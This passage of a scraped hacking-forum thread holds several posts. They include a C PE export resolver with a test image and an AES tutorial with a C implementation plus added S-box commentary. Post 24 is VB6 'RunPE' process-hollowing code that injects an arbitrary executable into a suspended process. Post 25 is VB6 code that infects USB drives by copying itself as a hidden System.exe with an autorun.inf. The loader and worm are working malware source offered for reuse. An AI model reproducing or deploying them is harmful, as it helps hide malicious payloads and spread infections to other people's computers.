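uint32_t resolve_export_rva(const uint8_t *img, size_t len, const char *name)
{
    if (len < 0x40 || rd16(img) != 0x5A4D) return 0;                          /* "MZ" */
    uint32_t nt = rd32(img + 0x3C);                                            /* e_lfanew */
    if (nt > len - 0x1A || rd32(img + nt) != 0x00004550) return 0;             /* "PE\0\0" */
    uint16_t magic = rd16(img + nt + 0x18);                                    /* OptionalHeader.Magic */
    uint32_t dd = magic == 0x10B ? 96 : magic == 0x20B ? 112 : 0;              /* DataDirectory offset: PE32 / PE32+ */
    if (!dd || (uint64_t)nt + 0x18 + dd + 8 > len) return 0;
    uint32_t exp_rva = rd32(img + nt + 0x18 + dd);                             /* DataDirectory[0] = export */
    if (!exp_rva || exp_rva > len - 40) return 0;
    const uint8_t *ed = img + exp_rva;                                         /* IMAGE_EXPORT_DIRECTORY */
    uint32_t nfunc = rd32(ed + 20), nnames = rd32(ed + 24);
    uint32_t eat = rd32(ed + 28), ent = rd32(ed + 32), eot = rd32(ed + 36);
    if ((uint64_t)eat + 4ULL * nfunc > len || (uint64_t)ent + 4ULL * nnames > len ||
        (uint64_t)eot + 2ULL * nnames > len) return 0;

    for (uint32_t i = 0; i < nnames; i++) {
        uint32_t name_rva = rd32(img + ent + 4 * i);                           /* ENT[i] */
        if (name_rva >= len || !memchr(img + name_rva, 0, len - name_rva)) return 0; /* unterminated */
        if (strcmp((const char *)img + name_rva, name) != 0) continue;
        uint16_t ord = rd16(img + eot + 2 * i);                                /* EOT[i]: index into EAT */
        if (ord >= nfunc) return 0;
        return rd32(img + eat + 4 * ord);                                      /* EAT[ord] */
    }
    return 0;
}

/* Constructed test image (not a real DLL): flat 512-byte PE32 with three exports. The
 * name table is sorted (as in real PEs) while the function table is in a different order,
 * so a correct lookup must go through the ordinal table. */
size_t build_test_image(uint8_t *buf, size_t cap)
{
    const uint32_t NT = 0x40, EXP = 0x100, EAT = 0x140, ENT = 0x150, EOT = 0x160, STR = 0x170;
    const uint32_t func_rva[3] = { 0x1000, 0x2000, 0x3000 };          /* EAT, in ordinal order */
    const char *names[3] = { "GetProcAddress", "LoadLibraryA", "VirtualAlloc" };
    const uint16_t ordinal[3] = { 2, 0, 1 };                            /* EOT: name i -> EAT index */

    if (cap < 0x200) return 0;
    memset(buf, 0, 0x200);
    wr16(buf, 0x5A4D);                 wr32(buf + 0x3C, NT);            /* DOS header */
    wr32(buf + NT, 0x00004550);                                         /* PE signature */
    wr16(buf + NT + 0x18, 0x10B);                                       /* OptionalHeader.Magic = PE32 */
    wr32(buf + NT + 0x18 + 96, EXP);   wr32(buf + NT + 0x18 + 100, 0x40); /* DataDirectory[EXPORT] */
    wr32(buf + EXP + 16, 1);                                            /* Base */
    wr32(buf + EXP + 20, 3);           wr32(buf + EXP + 24, 3);         /* NumberOfFunctions / NumberOfNames */
    wr32(buf + EXP + 28, EAT);         wr32(buf + EXP + 32, ENT);       wr32(buf + EXP + 36, EOT);
    for (int i = 0; i < 3; i++) {
        wr32(buf + EAT + 4 * i, func_rva[i]);
        wr32(buf + ENT + 4 * i, STR + 0x10 * i);
        wr16(buf + EOT + 2 * i, ordinal[i]);
        strcpy((char *)buf + STR + 0x10 * i, names[i]);
    }
    return 0x200;
}

/* 1 when every lookup on the test image resolves as expected, including rejection of a truncated copy. */
int check_resolver(void)
{
    uint8_t img[0x200];
    if (build_test_image(img, sizeof img) != 0x200) return 0;
    return resolve_export_rva(img, sizeof img, "LoadLibraryA")   == 0x1000 &&
           resolve_export_rva(img, sizeof img, "GetProcAddress") == 0x3000 &&
           resolve_export_rva(img, sizeof img, "VirtualAlloc")   == 0x2000 &&
           resolve_export_rva(img, sizeof img, "NtDoesNotExist") == 0 &&
           resolve_export_rva(img, 0x150, "LoadLibraryA")        == 0;   /* name table lies past the end */
}

int main(void)
{
    uint8_t img[0x200];
    const char *want[] = { "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "NtDoesNotExist" };

    build_test_image(img, sizeof img);
    for (int i = 0; i < 4; i++)
        printf("%-16s -> RVA 0x%04x\n", want[i], resolve_export_rva(img, sizeof img, want[i]));
    return check_resolver() ? 0 : 1;
}
```

The resolver returns an RVA rather than a pointer so the same function serves both a mapped module (add the base) and a file read from disk (translate through the section table first); it also stops at the first malformed table instead of reading past the buffer, which my_gpa cannot do because it never learns the module's size.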
  22. AES Explained

Hello people,

It's been a while since I have last posted an article. I decided to write an article about the Advanced Encryption Standard. I will explain certain concepts regarding AES and how it basically works. I will provide step by step C code, to make it even easier to understand. You can find the full source code at the end of this article. Actually many websites around the net provide source code for AES. This one is supposed to be easy to understand.

What is AES?

AES is a cryptographic algorithm, more specifically a symmetric block cipher. This means that it operates on a block of data, instead of a single element per iteration. (This element could be a bit or a byte.) AES is also known as Rijndael. Actually AES is just a variant of Rijndael. To read more about AES/Rijndael see Advanced Encryption Standard - Wikipedia, the free encyclopedia. Especially the links at the bottom, they help in understanding the basic structure of AES.

AES is able to encrypt and decrypt a block of data using a key. The key and the block of data (from now on, the input) have a fixed length. The input is always 128-bit (16 bytes), while the key can be 128-bit, 192-bit or 256-bit (16, 24 and 32 bytes respectively).

What makes AES so good, you say? The answer would be its security and speed. It's obviously secure since it's been chosen by NIST. Then again, no one has been able to break it. And finally, it's fast because its arithmetic is based on XOR operations and bit shifts, which CPUs like a lot. That said, it's also simple and even faster to implement in hardware.

AES Concepts

Before I begin talking about the cipher itself, there are some very important concepts that I need to explain. They're basically the math behind AES. Everything else is easy. This is actually the hardest part. Why am I explaining the hardest part before everything else? Because if you don't understand this, you won't be able to understand the rest of this article.

Of course, if you just want the source code, skip to the end. The content below may refer to the specification, which is located here: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf

The nicely formatted article: http://www.x-n2o.com/aes-explained/
  23. [C] AES Implementation

Author: X-N2O

I joined all the source inside the code tags. If you want to use it, you have the separate files aes.c, aes.h and main.c inside the zip file. Enjoy.

// AES Implementation by X-N2O
// Started: 15:41:35 - 18 Nov 2009
// Finished: 20:03:59 - 21 Nov 2009
// Logarithm, S-Box, and RCON tables are not hardcoded
// Instead they are generated when the program starts
// All of the code below is based from the AES specification
// You can find it at http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
// You may use this code as you wish, but do not remove this comment
// This is only a proof of concept, and should not be considered as the most efficient implementation

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>

#define AES_RPOL 0x011b    // reduction polynomial (x^8 + x^4 + x^3 + x + 1)
#define AES_GEN 0x03       // gf(2^8) generator (x + 1)
#define AES_SBOX_CC 0x63   // S-Box C constant

#define KEY_128 (128/8)
#define KEY_192 (192/8)
#define KEY_256 (256/8)

// gf(2^8) multiplication and inverse via the log/antilog tables
#define aes_mul(a, b) ((a)&&(b)?g_aes_ilogt[(g_aes_logt[(a)]+g_aes_logt[(b)])%0xff]:0)
#define aes_inv(a) ((a)?g_aes_ilogt[0xff-g_aes_logt[(a)]]:0)

unsigned char g_aes_logt[256], g_aes_ilogt[256];
unsigned char g_aes_sbox[256], g_aes_isbox[256];

typedef struct {
    unsigned char state[4][4];
    int kcol;                 // key length in 32-bit words (Nk)
    size_t rounds;            // number of rounds (Nr)
    uint32_t keysched[];      // 4*(rounds+1) round-key words, allocated right after the struct
} aes_ctx_t;

void init_aes(void);
aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen);
static inline uint32_t aes_subword(uint32_t w);
static inline uint32_t aes_rotword(uint32_t w);
void aes_keyexpansion(aes_ctx_t *ctx);
static inline unsigned char aes_mul_manual(unsigned char a, unsigned char b); // use aes_mul instead
void aes_subbytes(aes_ctx_t *ctx);
void aes_shiftrows(aes_ctx_t *ctx);
void aes_mixcolumns(aes_ctx_t *ctx);
void aes_addroundkey(aes_ctx_t *ctx, int round);
void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]);
void aes_invsubbytes(aes_ctx_t *ctx);
void aes_invshiftrows(aes_ctx_t *ctx);
void aes_invmixcolumns(aes_ctx_t *ctx);
void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]);
void aes_free_ctx(aes_ctx_t *ctx);

void init_aes(void) {
    int i;
    unsigned char gen;

    // build logarithm table and its inverse
    gen = 1;
    for(i = 0; i < 0xff; i++) {
        g_aes_logt[gen] = i;
        g_aes_ilogt[i] = gen;
        gen = aes_mul_manual(gen, AES_GEN);
    }
    // 3^255 = 1, so the antilog table needs this entry as well:
    // aes_inv(1) reads g_aes_ilogt[0xff], which would otherwise be 0
    g_aes_ilogt[0xff] = 1;

    // build S-Box and its inverse
    for(i = 0; i <= 0xff; i++) {
        char bi;
        unsigned char inv = aes_inv(i);
        g_aes_sbox[i] = 0;
        for(bi = 0; bi < 8; bi++) {
            // based on transformation 5.1
            // could also be done with a loop based on the matrix
            g_aes_sbox[i] |= (
                  (inv & (1<<bi)?1:0)
                ^ (inv & (1 << ((bi+4) & 7))?1:0)
                ^ (inv & (1 << ((bi+5) & 7))?1:0)
                ^ (inv & (1 << ((bi+6) & 7))?1:0)
                ^ (inv & (1 << ((bi+7) & 7))?1:0)
                ^ (AES_SBOX_CC & (1 << bi)?1:0)
            ) << bi;
        }
        g_aes_isbox[g_aes_sbox[i]] = i;
    }
}

aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen) {
    aes_ctx_t *ctx;
    size_t rounds;
    size_t ks_size;

    switch(keyLen) {
        case 16: // 128-bit key
            rounds = 10;
            break;
        case 24: // 192-bit key
            rounds = 12;
            break;
        case 32: // 256-bit key
            rounds = 14;
            break;
        default:
            return NULL;
    }

    ks_size = 4*(rounds+1)*sizeof(uint32_t);
    ctx = malloc(sizeof(aes_ctx_t)+ks_size);
    if(ctx) {
        ctx->rounds = rounds;
        ctx->kcol = keyLen/4;
        memcpy(ctx->keysched, key, keyLen);
        aes_keyexpansion(ctx);
    }

    return ctx;
}

static inline uint32_t aes_subword(uint32_t w) {
    return g_aes_sbox[w & 0x000000ff] |
        (g_aes_sbox[(w & 0x0000ff00) >> 8] << 8) |
        (g_aes_sbox[(w & 0x00ff0000) >> 16] << 16) |
        (g_aes_sbox[(w & 0xff000000) >> 24] << 24);
}

static inline uint32_t aes_rotword(uint32_t w) {
    // May seem a bit different from the spec
    // It was changed because the word is represented with little-endian convention on x86
    // Should not depend on architecture, but this is only a POC
    return ((w & 0x000000ff) << 24) |
        ((w & 0x0000ff00) >> 8) |
        ((w & 0x00ff0000) >> 8) |
        ((w & 0xff000000) >> 8);
}

void aes_keyexpansion(aes_ctx_t *ctx) {
    uint32_t temp;
    uint32_t rcon;
    register int i;

    rcon = 0x00000001;
    for(i = ctx->kcol; i < (4*(ctx->rounds+1)); i++) {
        temp = ctx->keysched[i-1];
        if(!(i%ctx->kcol)) {
            temp = aes_subword(aes_rotword(temp)) ^ rcon;
            rcon = aes_mul(rcon, 2);
        } else if(ctx->kcol > 6 && i%ctx->kcol == 4)
            temp = aes_subword(temp);
        ctx->keysched[i] = ctx->keysched[i-ctx->kcol] ^ temp;
    }
}

static inline unsigned char aes_mul_manual(unsigned char a, unsigned char b) {
    register unsigned short ac;
    register unsigned char ret;

    ac = a;
    ret = 0;
    while(b) {
        if(b & 0x01)
            ret ^= ac;

        ac <<= 1;
        b >>= 1;

        if(ac & 0x0100)
            ac ^= AES_RPOL;
    }

    return ret;
}

void aes_subbytes(aes_ctx_t *ctx) {
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;

        x = i & 0x03;
        y = i >> 2;
        ctx->state[x][y] = g_aes_sbox[ctx->state[x][y]];
    }
}

void aes_shiftrows(aes_ctx_t *ctx) {
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;

        x = i & 0x03;
        y = i >> 2;
        nstate[x][y] = ctx->state[x][(y+x) & 0x03];
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_mixcolumns(aes_ctx_t *ctx) {
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 4; i++) {
        nstate[0][i] = aes_mul(0x02, ctx->state[0][i]) ^ aes_mul(0x03, ctx->state[1][i]) ^ ctx->state[2][i] ^ ctx->state[3][i];
        nstate[1][i] = ctx->state[0][i] ^ aes_mul(0x02, ctx->state[1][i]) ^ aes_mul(0x03, ctx->state[2][i]) ^ ctx->state[3][i];
        nstate[2][i] = ctx->state[0][i] ^ ctx->state[1][i] ^ aes_mul(0x02, ctx->state[2][i]) ^ aes_mul(0x03, ctx->state[3][i]);
        nstate[3][i] = aes_mul(0x03, ctx->state[0][i]) ^ ctx->state[1][i] ^ ctx->state[2][i] ^ aes_mul(0x02, ctx->state[3][i]);
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_addroundkey(aes_ctx_t *ctx, int round) {
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;

        x = i & 0x03;
        y = i >> 2;
        ctx->state[x][y] = ctx->state[x][y] ^ ((ctx->keysched[round*4+y] & (0xff << (x*8))) >> (x*8));
    }
}

void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) {
    int i;

    // copy input to state
    for(i = 0; i < 16; i++)
        ctx->state[i & 0x03][i >> 2] = input[i];

    aes_addroundkey(ctx, 0);
    for(i = 1; i < ctx->rounds; i++) {
        aes_subbytes(ctx);
        aes_shiftrows(ctx);
        aes_mixcolumns(ctx);
        aes_addroundkey(ctx, i);
    }

    aes_subbytes(ctx);
    aes_shiftrows(ctx);
    aes_addroundkey(ctx, ctx->rounds);

    // copy state to output
    for(i = 0; i < 16; i++)
        output[i] = ctx->state[i & 0x03][i >> 2];
}

void aes_invshiftrows(aes_ctx_t *ctx) {
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;

        x = i & 0x03;
        y = i >> 2;
        nstate[x][(y+x) & 0x03] = ctx->state[x][y];
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_invsubbytes(aes_ctx_t *ctx) {
    int i;

    for(i = 0; i < 16; i++) {
        int x, y;

        x = i & 0x03;
        y = i >> 2;
        ctx->state[x][y] = g_aes_isbox[ctx->state[x][y]];
    }
}

void aes_invmixcolumns(aes_ctx_t *ctx) {
    unsigned char nstate[4][4];
    int i;

    for(i = 0; i < 4; i++) {
        nstate[0][i] = aes_mul(0x0e, ctx->state[0][i]) ^ aes_mul(0x0b, ctx->state[1][i]) ^ aes_mul(0x0d, ctx->state[2][i]) ^ aes_mul(0x09, ctx->state[3][i]);
        nstate[1][i] = aes_mul(0x09, ctx->state[0][i]) ^ aes_mul(0x0e, ctx->state[1][i]) ^ aes_mul(0x0b, ctx->state[2][i]) ^ aes_mul(0x0d, ctx->state[3][i]);
        nstate[2][i] = aes_mul(0x0d, ctx->state[0][i]) ^ aes_mul(0x09, ctx->state[1][i]) ^ aes_mul(0x0e, ctx->state[2][i]) ^ aes_mul(0x0b, ctx->state[3][i]);
        nstate[3][i] = aes_mul(0x0b, ctx->state[0][i]) ^ aes_mul(0x0d, ctx->state[1][i]) ^ aes_mul(0x09, ctx->state[2][i]) ^ aes_mul(0x0e, ctx->state[3][i]);
    }

    memcpy(ctx->state, nstate, sizeof(ctx->state));
}

void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) {
    int i;

    // copy input to state
    for(i = 0; i < 16; i++)
        ctx->state[i & 0x03][i >> 2] = input[i];

    aes_addroundkey(ctx, ctx->rounds);
    for(i = ctx->rounds-1; i >= 1; i--) {
        aes_invshiftrows(ctx);
        aes_invsubbytes(ctx);
        aes_addroundkey(ctx, i);
        aes_invmixcolumns(ctx);
    }

    aes_invshiftrows(ctx);
    aes_invsubbytes(ctx);
    aes_addroundkey(ctx, 0);

    // copy state to output
    for(i = 0; i < 16; i++)
        output[i] = ctx->state[i & 0x03][i >> 2];
}

void aes_free_ctx(aes_ctx_t *ctx) {
    free(ctx);
}

int main(int argc, char *argv[]) {
    unsigned char key[KEY_128] = "uber strong key!";
    unsigned char ptext[16] = "Attack at dawn!";
    unsigned char ctext[16];
    unsigned char decptext[16];
    aes_ctx_t *ctx;

    init_aes();
    ctx = aes_alloc_ctx(key, sizeof(key));
    if(!ctx) {
        perror("aes_alloc_ctx");
        return EXIT_FAILURE;
    }

    aes_encrypt(ctx, ptext, ctext);
    aes_decrypt(ctx, ctext, decptext);

    puts((char *)decptext);

    aes_free_ctx(ctx);
    return EXIT_SUCCESS;
}

In the attached zip you will also find the compiled ELF binary.

Download (an account may be required): http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=2875

Source: [C] AES Implementation - rohitab.com - Forums
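The GF(2^8) arithmetic that post 22 calls "the math behind AES", and the table-driven S-box construction that the implementation in post 23 relies on, as an added example that is not X-N2O's code and not part of either post. It builds the log/antilog tables from the generator {03}, derives the multiplicative inverse and the affine transformation of FIPS-197 equation 5.1 from them, and checks the results against values the specification itself gives ({57}•{83} = {c1}, {53}^-1 = {ca}, S-box({53}) = {ed}). All function and table names are the example's own. It also shows the edge case that the posted implementation patches with its "quickhack": the antilog table needs an entry at exponent 255 (3^255 = 1), otherwise the inverse of {01} reads as 0 and S-box({01}) collides with S-box({00}), which silently corrupts the inverse S-box.

```c
/* Added example (not from the posts above): GF(2^8) arithmetic and
 * S-box construction as described in FIPS-197 sections 4.2 and 5.1.1,
 * cross-checked against values the specification states. */
#include <stdint.h>
#include <stdio.h>

#define GF_RPOL 0x11b   /* x^8 + x^4 + x^3 + x + 1 */
#define GF_GEN  0x03    /* generator used for the log/antilog tables */
#define SBOX_C  0x63    /* constant of the affine transformation (eq. 5.1) */

static uint8_t gf_log[256], gf_alog[256], sbox[256], inv_sbox[256];

/* Shift-and-reduce multiplication: repeated xtime() as in FIPS-197 4.2.1 */
uint8_t gf_mul_bitwise(uint8_t a, uint8_t b)
{
    uint16_t acc = a;
    uint8_t r = 0;
    while (b) {
        if (b & 1) r ^= (uint8_t)acc;
        acc <<= 1;
        if (acc & 0x100) acc ^= GF_RPOL;   /* reduce when degree reaches 8 */
        b >>= 1;
    }
    return r;
}

/* Build log/antilog tables: alog[i] = {03}^i. {03} generates all 255 non-zero bytes. */
void gf_init_tables(void)
{
    uint16_t g = 1;
    for (int i = 0; i < 255; i++) {
        gf_alog[i] = (uint8_t)g;
        gf_log[g] = (uint8_t)i;
        g = gf_mul_bitwise((uint8_t)g, GF_GEN);
    }
    /* {03}^255 = 1. Without this entry gf_inv(1) would return 0: this is the
     * edge case the "quickhack" in the posted implementation works around. */
    gf_alog[255] = 1;
}

/* Table multiply: a*b = alog[(log a + log b) mod 255], zero has no logarithm */
uint8_t gf_mul_table(uint8_t a, uint8_t b)
{
    if (!a || !b) return 0;
    return gf_alog[(gf_log[a] + gf_log[b]) % 255];
}

/* a^-1 = {03}^(255 - log a); 0 has no inverse and is mapped to 0 for the S-box */
uint8_t gf_inv(uint8_t a)
{
    return a ? gf_alog[255 - gf_log[a]] : 0;
}

/* Affine transformation of FIPS-197 eq. 5.1 applied to the multiplicative inverse:
 * b'_i = b_i ^ b_(i+4) ^ b_(i+5) ^ b_(i+6) ^ b_(i+7) ^ c_i, indices mod 8 */
uint8_t sbox_entry(uint8_t x)
{
    uint8_t inv = gf_inv(x), out = 0;
    for (int i = 0; i < 8; i++) {
        int bit = ((inv >> i) ^ (inv >> ((i + 4) & 7)) ^ (inv >> ((i + 5) & 7))
                 ^ (inv >> ((i + 6) & 7)) ^ (inv >> ((i + 7) & 7)) ^ (SBOX_C >> i)) & 1;
        out |= (uint8_t)(bit << i);
    }
    return out;
}

void build_sbox(void)
{
    for (int x = 0; x < 256; x++) {
        sbox[x] = sbox_entry((uint8_t)x);
        inv_sbox[sbox[x]] = (uint8_t)x;
    }
}

/* Consistency check a practitioner would run once on generated tables:
 * table multiply agrees with bitwise multiply for all 65536 pairs, and the
 * inverse S-box really inverts the S-box (fails if two inputs collide). Returns 1 on success. */
int self_check(void)
{
    gf_init_tables();
    build_sbox();
    for (int a = 0; a < 256; a++)
        for (int b = 0; b < 256; b++)
            if (gf_mul_table((uint8_t)a, (uint8_t)b) != gf_mul_bitwise((uint8_t)a, (uint8_t)b))
                return 0;
    for (int x = 0; x < 256; x++)
        if (inv_sbox[sbox[x]] != x)
            return 0;
    return 1;
}

int main(void)
{
    printf("self check: %s\n", self_check() ? "ok" : "FAILED");
    printf("{57}*{83}  = {%02x}  (FIPS-197: {c1})\n", gf_mul_bitwise(0x57, 0x83));
    printf("{53}^-1    = {%02x}  (FIPS-197: {ca})\n", gf_inv(0x53));
    printf("S-box({53}) = {%02x}  (FIPS-197: {ed})\n", sbox[0x53]);
    return 0;
}
```

The check against the specification's own values is what distinguishes a working table generator from one that merely round-trips: an implementation whose encrypt and decrypt are consistent with each other can still disagree with every other AES implementation, and the S-box collision described above is exactly that kind of fault.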
  24. [VB6] RunPe + CallApiByName (JunPE) Product: JunPE Description: RunPe + CallApiByName Author: Jhonjhon_123 - [J.J.G.P] Option Explicit ' ****************************************************************************************************************************** ' ' ' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer) ' --- Descripción: RunPe + CallApiByName ' --- Distribución: Libre ' --- Terminos De Uso: ' --- Prohibida su comercialización. ' --- No Debe eliminar los creditos. ' ' --- Funciones: ' --- IniciarDDLL() ' - Inicializa la configuración ' ' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte) ' - RunPE ' * sName: Ruta al exe ' * bBytes: Bytes a ejecutar ' ' ****************************************************************************************************************************** ' Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long Dim bMoveMem(36) As Byte Public Sub IniciarDDLL() Dim vTMP As Variant Dim D As Long For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20) bMoveMem(D) = CByte(vTMP): D = D + 1 Next End Sub 'By Cobein Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long On Error Resume Next Dim lPtr As Long Dim bvASM(&HEC00& - 1) As Byte Dim i As Long Dim lMod As Long lMod = GetProcAddress(LoadLibraryA(sLib), sMod) If lMod = 0 Then Exit Function lPtr = VarPtr(bvASM(0)) RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4 RtlMoveMemory 
ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2 For i = UBound(Params) To 0 Step -1 RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4 Next RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4 RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1 Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0) End Function ' By Strike Bot Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long) Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0) End Sub ' By Jhonjhon_123 Public Sub ExecuteBytes(sName As String, bBytes() As Byte) On Error Resume Next Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER Dim bInh(247) As Byte ' IMAGE_NT_HEADERS Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER Dim bPi(15) As Byte ' PROCESS_INFORMATION Dim bSi(67) As Byte ' STARTUPINFO Dim bCtx(203) As Byte ' CONTEXT86 Dim e_lfanew As Long Dim ImageBase As Long Dim hProcess As Long Dim hThread As Long Dim SizeOfImage As Long Dim SizeOfHeaders As Long Dim AddressOfEntryPoint As Long Dim NumberOfSections As Integer Dim VirtualAddress As Long Dim PointerToRawData As Long Dim SizeOfRawData As Long Dim Ebx As Long Dim Eax As Long Dim lTemp As Long Dim D As Long lTemp = 68 MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4& lTemp = &H10007 MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4& MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64& MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4& MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248& MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4& MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4& MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4& MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4& MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2& Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0))) MoveMemory VarPtr(hProcess), 
VarPtr(bPi(0)), 4& MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4& Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase) Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40) Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0) For D = 0 To NumberOfSections - 1 MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40& MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4& MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4& MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4& Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0) Next Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0))) MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4& Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0) lTemp = ImageBase + AddressOfEntryPoint MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4& Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0))) Call Call_("kernel32", "ResumeThread", hThread) End Sub Sursa: RunPe + CallApiByName (JunPE)
  25. [VB6] Infect USB Author: mikeh18 Hello all, Here's some modified code i made for detect + infect USB drives using autorun Sub Main() On Error Resume Next 'Object and Strings Dim WMIService As Object, USBDrives As Object, USBFound As Object, USB As String, USBCount As String 'Objects Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'Open WMIService Set USBDrives = WMIService.ExecQuery("Select * from Win32_LogicalDisk") 'Look For Computer Drives drives For Each USBFound In USBDrives 'Look for all our drives If USBFound.DriveType = 2 Then 'If drivetype is USB USB = USBFound.Name 'Set USB as New USB-name USBCount = USBCount & " - " & USBFound.Name 'Add USB name to USB-count End If If USB = "" Then GoTo volgende 'If its not an USB-Drive then goto Next FileCopy App.Path & "\" & App.EXEName & ".exe", USB & "System.exe" 'Copy File to New USB Drive Open USB & "autorun.inf" For Output As #1 'Create a Autorun file Print #1, "[autorun]" 'Put Right Settings in it Print #1, "open=System.exe" 'Put Our exe-name in It Close #1 'Close the Autorun File SetAttr USB & "System.exe", vbHidden ' vbHidden 'Hide our Exe File SetAttr USB & "autorun.inf", vbHidden 'Hide the Autorun File volgende: 'Next Next 'Search for more USB drives MsgBox "USB Drives: " & USB & vbNewLine & "Successfull Invected!", vbInformation, "USB Infect" 'Msg When Done End End Sub Mikeh18 Sursa: [VB6] Infect USB